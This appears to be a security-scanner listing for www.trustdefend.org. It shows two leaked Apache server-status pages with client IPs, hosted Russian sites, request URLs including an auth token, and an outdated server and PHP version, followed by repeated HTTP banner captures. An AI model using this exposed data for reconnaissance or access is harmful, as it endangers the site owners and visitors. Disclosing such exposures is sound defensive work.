      31.173.87.189secpro.ru:8080GET /wa-data/public/shop/products/14/webp/data/public/site/1/se
      
      1-250-0/0/478161.
      0.15200.00.0029826.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      2-25030600/357/468211_
      0.580290.051.7630442.63
      5.255.253.39mintim.ru:8080POST /pokupki/api/cart?auth-token=4F0000014D88C49B HTTP/1.0
      
      3-250152940/41/454636W
      0.06100.01.4030337.84
      66.249.76.164den35.ru:8080GET /product.php?z/T534697 HTTP/1.0
      
      4-250128370/153/457355W
      0.22100.05.1628636.73
      66.249.72.133den35.ru:8080GET /product.php?z/M281836 HTTP/1.0
      
      5-250138280/68/447447W
      0.152000.03.8628057.82
      185.240.102.28elektriksan.ru:8080GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&s
      
      6-250138290/87/449510_
      0.130360.02.7929515.34
      94.26.240.165isp25test.adminvps.ru:8080GET / HTTP/1.0
      
      7-250159540/9/438096W
      0.01000.01.0928144.90
      139.144.150.45trustdefend.org:8080GET /server-status HTTP/1.0
      
      8-250113590/63/433283W
      0.124500.02.9128326.30
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      9-25048010/334/428043W
      0.541000.014.8127201.23
      188.234.16.15blue-issyk-kul.ru:8080GET /Film_sait_2_570.mp4 HTTP/1.0
      
      10-250153820/32/410400W
      0.04000.02.3026794.82
      94.25.168.73taroclass.ru:8080GET /shemy-raskladov-taro-na-otnoshenija-i-ljubov/ HTTP/1.0
      
      11-250145550/71/409015_
      0.11000.03.8125813.11
      69.158.246.203ww3.buddytutu.ru:8080GET /ps/NF67zq.js HTTP/1.0
      
      12-250157310/17/397336_
      0.0202720.00.6624994.06
      176.59.8.169turpotok.com:8080GET /?wordfence_lh=1&hid=DA1AC0DB1F89E81EDD86749F13448E91&r=0.9
      
      13-250-0/0/387798.
      0.105800.00.0023942.07
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-250-0/0/376916.
      0.018700.00.0024390.74
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-250-0/0/363773.
      0.385100.00.0023745.35
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-250-0/0/365737.
      0.212400.00.0023795.90
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-250-0/0/351582.
      0.331800.00.0022565.03
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-25093540/168/339749W
      0.26000.042.3621235.63
      66.249.76.161den35.ru:8080GET /product.php?z/Y1332576 HTTP/1.0
      
      19-250-0/0/307258.
      0.017900.00.0020046.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-250-0/0/308415.
      0.108600.00.0018857.47
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-250115430/126/284211W
      0.24100.03.4618404.31
      66.249.72.133den35.ru:8080GET /product.php?z/H354316 HTTP/1.0
      
      22-250-0/0/273060.
      0.0760960.00.0017324.72
      213.180.203.152vidook.ru:8080GET /%D1%80%D0%BE%D1%81%D1%82%D0%B8%D0%BA%2B%D0%B1%D1%80%D0%B5%
      
      23-250-0/0/258195.
      0.145600.00.0017128.18
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-250-0/0/236156.
      0.047000.00.0015122.89
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-250-0/0/229732.
      0.125200.00.0015346.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-250-0/0/213507.
      0.122300.00.0013576.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-250-0/0/191139.
      0.085900.00.0012153.52
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-250-0/0/179514.
      0.162500.00.0011492.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-250-0/0/165356.
      0.107800.00.0010777.09
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-250-0/0/159577.
      0.066800.00.0010407.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-250-0/0/150579.
      0.155500.00.009350.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-250-0/0/142076.
      0.016100.00.009153.21
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-250-0/0/127860.
      0.018900.00.007923.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      Found on 2023-08-17 13:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42161ee963

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 17-Aug-2023 12:20:54 MSK
      Restart Time: Sunday, 13-Aug-2023 03:53:03 MSK
      Parent Server Config. Generation: 239
      Parent Server MPM Generation: 238
      Server uptime:  4 days 8 hours 27 minutes 51 seconds
      Server load: 8.99 10.46 10.42
      Total accesses: 12502124 - Total Traffic: 780.2 GB
      CPU Usage: u27.78 s6.46 cu0 cs0 - .0091% CPU load
      33.2 requests/sec - 2.1 MB/second - 65.4 kB/request
      42 requests currently being processed, 7 idle workers
      W_WWW_WWWWWW_WWWWWWWCWWWWWWWW_WWWWWWWWGW_W_W_WWWW...............
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-238274860/131/456228W
      0.241700.06.4429073.19
      95.108.213.95mebozon.ru:8080GET /shkafy/shkafy-kupe/shkaf-kupe-korsika-240-trehdvernyj-s-ze
      
      1-238288510/42/462415_
      0.05071080.02.1628662.61
      95.108.213.93mebozon.ru:8080GET /pryamye-divany/divan-berger-m-textile-belaya-emal-grey HTT
      
      2-238301870/61/453821W
      0.11500.02.1029457.83
      95.108.213.107mebozon.ru:8080GET /divany/uglovye-divany/divan-uglovoj-kolibri-dizajn-4 HTTP/
      
      3-238319820/4/438935W
      0.00000.00.0029193.41
      139.144.150.205trustdefend.org:8080GET /server-status HTTP/1.0
      
      4-238274730/168/441803W
      0.31000.05.9527651.58
      89.22.232.206aboutcinema.ru:8080GET /2023/08/sumasshedshee-serdce-2009/ HTTP/1.0
      
      5-238312670/19/432220_
      0.03071270.00.9926917.93
      95.108.213.105mebozon.ru:8080GET /ecomeb/divan-uglovoj-bryussel-velvet-green?page=85 HTTP/1.
      
      6-238276340/158/433585W
      0.25400.06.6628435.95
      95.108.213.110mebozon.ru:8080GET /rosmebel/divan-lajt-braun-flauers?page=8 HTTP/1.0
      
      7-238313020/11/422987W
      0.01000.00.5627193.53
      5.255.231.47xn--34-6kcajmhz0a0a7bd.xn--p1aiGET /index.php?route=product/category&path=310&page=2 HTTP/1.0
      
      8-238277620/156/418330W
      0.25000.06.0827431.89
      95.108.213.184legomebel.com.ua:8080GET / HTTP/1.0
      
      9-238303710/11/414275W
      0.023300.00.5626382.53
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-238279220/98/396349W
      0.202000.04.1725695.74
      95.108.213.238mebozon.ru:8080GET /divan-modulnyj-holidej-lyuks-p-kantri-grej-delfin HTTP/1.0
      
      11-238303720/20/395598W
      0.03600.00.5824905.77
      213.180.203.190mebozon.ru:8080GET /rosmebel/stenka-pronto-2-glyantsevyj-mdf?page=135 HTTP/1.0
      
      12-238280070/134/382887_
      0.24000.06.5824173.94
      132.191.3.17ww2.buddytutu.ru:8080GET /ps/NF67zq.js HTTP/1.0
      
      13-238280460/153/374600W
      0.26500.05.1723026.56
      95.108.213.102mebozon.ru:8080GET /divany/pryamye-divany/divan-light-3 HTTP/1.0
      
      14-238317200/6/364221W
      0.01400.00.3823597.97
      95.108.213.105mebozon.ru:8080GET /rosmebel/divan-uglovoj-dubaj-kantri-grej?page=75 HTTP/1.0
      
      15-238280470/116/350907W
      0.21000.05.4322719.89
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      16-238304390/20/353589W
      0.031700.00.9623061.75
      95.108.213.238mebozon.ru:8080GET /ecomeb/divan-tehas-blek HTTP/1.0
      
      17-238290870/62/340525W
      0.10600.02.3121683.89
      213.180.203.63mebozon.ru:8080GET /rossiya/krovat-aleksandra?page=13 HTTP/1.0
      
      18-238317800/5/327743W
      0.01500.00.0420541.73
      95.108.213.85mebozon.ru:8080GET /divany/uglovye-divany/divan-uglovoj-dubaj-vajt HTTP/1.0
      
      19-238280950/92/295735W
      0.181600.03.4619181.35
      213.180.203.63mebozon.ru:8080GET /rosmebel/divan-uglovoj-marsel HTTP/1.0
      
      20-238290891/61/296341C
      0.11136799117.811.9418093.97
      180.247.78.192kalitkatomsk.ru:8080GET /mezhkomnatnye-dveri/107-krona/175-laura-do-chernyj-triplek
      
      21-238318140/17/274212W
      0.03000.00.2717933.02
      66.249.76.65ehto.ru:8080GET /montazh-elektriki/elektroshhitok/podklyuchenie-elektriches
      
      22-238305370/29/261924W
      0.051700.01.2316321.95
      95.108.213.80mebozon.ru:8080GET /rosmebel/divan-amsterdam-lyuks-07?page=3 HTTP/1.0
      
      23-238295400/62/247244W
      0.111900.02.5316305.42
      95.108.213.147mebozon.ru:8080GET /rosmebel/stenka-modulnaya-kuba-kompozitsiya-3?page=51 HTTP
      
      24-238318150/16/226855W
      0.02000.00.2614543.47
      217.174.227.18top-prof.ru:8080GET /wp-admin/admin-ajax.php?id=9375&action=wpshop_views_counte
      
      25-238274660/103/219383W
      0.202400.03.6714664.40
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      26-238295440/86/203717W
      0.14000.03.4012863.61
      66.249.72.135den35.ru:8080GET /product.php?z/D918669 HTTP/1.0
      
      27-238313030/17/180212W
      0.03700.01.0811477.95
      95.108.213.95mebozon.ru:8080GET /shkafy-na-zakaz/shkaf-zodiak-4-6a-mdf HTTP/1.0
      
      28-238313310/12/171602W
      0.01700.00.6810895.96
      95.108.213.122mebozon.ru:8080GET /glyancevye-shkafy-na-zakaz/shkaf-kupe-respekt-11-versal-ve
      
      29-238318160/10/156409_
      0.010260.00.2710046.69
      95.223.229.71ww2.buddytutu.ru:8080GET / HTTP/1.0
      
      30-238313330/17/149815W
      0.03600.00.55
      Found on 2023-08-17 09:20
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-20 02:08

    HTTP/1.1 200 OK
    Date: Thu, 20 Jun 2024 02:08:53 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BPUa%2FkX%2Bbte4GnDya0o3h7wHZNXT1TEiYjvca271QD5%2Fk9O0ODZRUojPSBgSUQK%2BksEp6B1aGR5o7jWkG6jdPMSbQ2lBWFcYux%2BTfwEiXMcqs8AFqpYuh%2BVbWnJzxZ8OciTEPtgN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 896836ad89892c39-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 9 hours ago by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-18 15:19

    HTTP/1.1 200 OK
    Date: Tue, 18 Jun 2024 15:19:53 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WlBgCqGQYwRKVUTVZGHU8%2FcqcUhPqTnQ2tYBS%2F5ZlQXht0Br7ic7n1DoSTKwKo%2B5fSuh9HHFXjvisyJmCI2gy4SyyRrnkiMp29W29sddCTY4bKZx%2FxtReKw4dNldrYeNWXzpCrv"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 895c42a0fafc90e2-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2 days ago by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-16 18:56

    HTTP/1.1 200 OK
    Date: Sun, 16 Jun 2024 18:56:33 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOIDhlW9B%2Fw%2Fey%2FV446TEukIV4L4iBz3%2Bt1vvU13lH8ixufZ1lHIb8WLqxdPvw7gbZXGYY4YWm0n%2F4fXGomkYbDw54uL1Bf9OJIbDid6PK51F04YA27ZfRTDAq1NMXJap2oE8sRJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 894d053feeef2c7a-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
                                            data-toggle="collapse"
                                            data-target="#navbarSupportedContent"
                                            aria-controls="navbarSupportedContent"
                                            aria-expanded="false"
                                            aria-label="Toggle navigation"
                                        >
                                            <span class="icon-bar top-bar"></span><span class="icon-bar middle-bar"></span><span class="icon-bar bottom-bar"></span>
                                        </button>
                                        <div class="collapse navbar-collapse" id="navbarSupportedContent">
                                            <ul class="navbar-nav m-auto">
                                                   <li class="nav-item"><a class="nav-link" href="/">Home</a></li>
                                                <!--li class="nav-item">
                                                    <a class="nav-link" href="/#">
                                                        Home
                                                       
                                                        <i class="bx bx-chevron-down"></i>
                                                    </a>
                                                    <ul class="dropdown-menu">
                                                        <li class="nav-item"><a class="nav-link" href="/">Home One</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index2/">Home Two</a></li>
                                                        <li class="nav-item"><a class="nav-link active" href="index.html">Home Three</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index4/">Home Four</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index5/">Home Five</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index6/">Home Six</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index7/">Home Seven</a></li>
                                                        <li class="nav-item"><a class="nav-link" href="/index8/">Home Eight</a></li>
                                                        <li class="nav-item
    Found 2024-06-16 by HttpPlugin
    Create report
  • Open service 2606:4700:3030::6815:1d5d:80 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 301 Moved Permanently
    Date: Thu, 13 Jun 2024 00:50:30 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Location: https://www.trustdefend.org:443/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fzQWK3HtsSF0ddcTCLfIYNefYAlMBj9lLKAmx9ZyhH0ZHjCDvoSFlVOcMOCojZMqbnFnvp6egy%2BIQ62wf2jjd7108G%2BtW6sLDqD8TwzuOniJyEurQSj6dZlOc547z6IMr82Z18MOXYBTE14liipkTAQV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e163d1d3e9ec0-CDG
    alt-svc: h3=":443"; ma=86400
    
    Page title: 301 Moved Permanently
    
    <html>
    <head><title>301 Moved Permanently</title></head>
    <body>
    <center><h1>301 Moved Permanently</h1></center>
    <hr><center>nginx/1.20.2</center>
    </body>
    </html>
    
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 2606:4700:3031::ac43:94b8:8443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 523 
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmULtihauG%2FZfDnDjNvNlUDEubxccFKDFoh4l3cRaFRf7Q8e%2FY8FWAbfcCCr8T6ff%2Bg%2FXsgwqiZHdzermDJJHWqkYdII0D9mfA1SrsOvY5a89kKAfqZFcB6v8A4c2SR4KJ%2F%2Baw0dCVriqVu3SRg95yg%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 892e1638c980a5ff-FRA
    alt-svc: h3=":8443"; ma=86400
    
    
    error code: 523
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 2606:4700:3031::ac43:94b8:80 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 301 Moved Permanently
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Location: https://www.trustdefend.org:443/
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Joii6tAwyZL6%2BAztI9BK%2FsRNejwelJ6Q2m4iW85qS0BXqNYIktHoG5na8EAZLK8fiKT51BXpngo4S0xMYItKNLCKewO%2BofUcgDbfriI%2FXOkqLCQRrvlgj9wtz111M19xHp6JM6deskDiQmFFrVTLh6gm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e163429f09f12-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: 301 Moved Permanently
    
    <html>
    <head><title>301 Moved Permanently</title></head>
    <body>
    <center><h1>301 Moved Permanently</h1></center>
    <hr><center>nginx/1.20.2</center>
    </body>
    </html>
    
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 104.21.29.93:8443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 523 
    Date: Thu, 13 Jun 2024 00:50:29 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIvYtv9Ykz8AEkkycqJTKWBinGIBN7Fu3AZOQCxGnU4UarwPL0JlKZtF%2FszBPrXvgreU9ElW7ADbD6Z9agwMYYL%2FIUrnVfvLCk4ABfFJ9maOSV3iMzvbS%2F1CbspknC78c%2FoMF9ai"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 892e16379e341994-FRA
    alt-svc: h3=":8443"; ma=86400
    
    
    error code: 523
    Found 2024-06-13 by HttpPlugin
    Create report
  • Open service 104.21.29.93:443 · www.trustdefend.org

    2024-06-13 00:50

    HTTP/1.1 200 OK
    Date: Thu, 13 Jun 2024 00:50:39 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z27iOH7hPcYoaVnqEDiab9Yi4euh2WNZufPEe0rm7BaSDjQaEortLUDH3OwLzz5ywrk6uWDJwQ3FNWZl2zVDfcZu8f3u19IWDc6Jxtl7kmouksKV5SOdvF4d0LdlXkjMenzkaI84"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 892e165c1bcb65cf-FRA
    alt-svc: h3=":443"; ma=86400
    
    Page title: Trust Defend - antiscam, malware, guard networking
    
    <!DOCTYPE html>
    <html lang="zxx">
        <head>
            <title>Trust Defend - antiscam, malware, guard networking</title>
            <meta charset="utf-8" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
            <meta name="next-head-count" content="3" />
            <link href="https://fonts.googleapis.com/css2?family=Rubik:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&amp;display=swap" rel="stylesheet" />
            <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,200;1,300;1,400;1,500;1,600;1,700&amp;display=swap" rel="stylesheet" />
            <link rel="icon" type="image/png" href="favicon.png" />
            <link rel="preload" href="static/css/de73be39f5d47379.css" as="style" />
            <link rel="stylesheet" href="static/css/de73be39f5d47379.css" data-n-g="" />
            <noscript data-n-css=""></noscript>
    
    
        </head>
        <body>
            <div id="__next">
                <header class="header-area fixed-top">
                    <div class="nav-area nav-area-three">
                        <div id="navbar" class="navbar-area">
                            <div class="main-nav">
                                <div class="container-fluid">
                                    <nav class="navbar navbar-expand-md navbar-light">
                                        <a class="navbar-brand" href="/"><img src="/logo.png" width="100" alt="logo" /></a>
                                        <button
                                            class="navbar-toggler navbar-toggler-right collapsed"
                                            type="button"
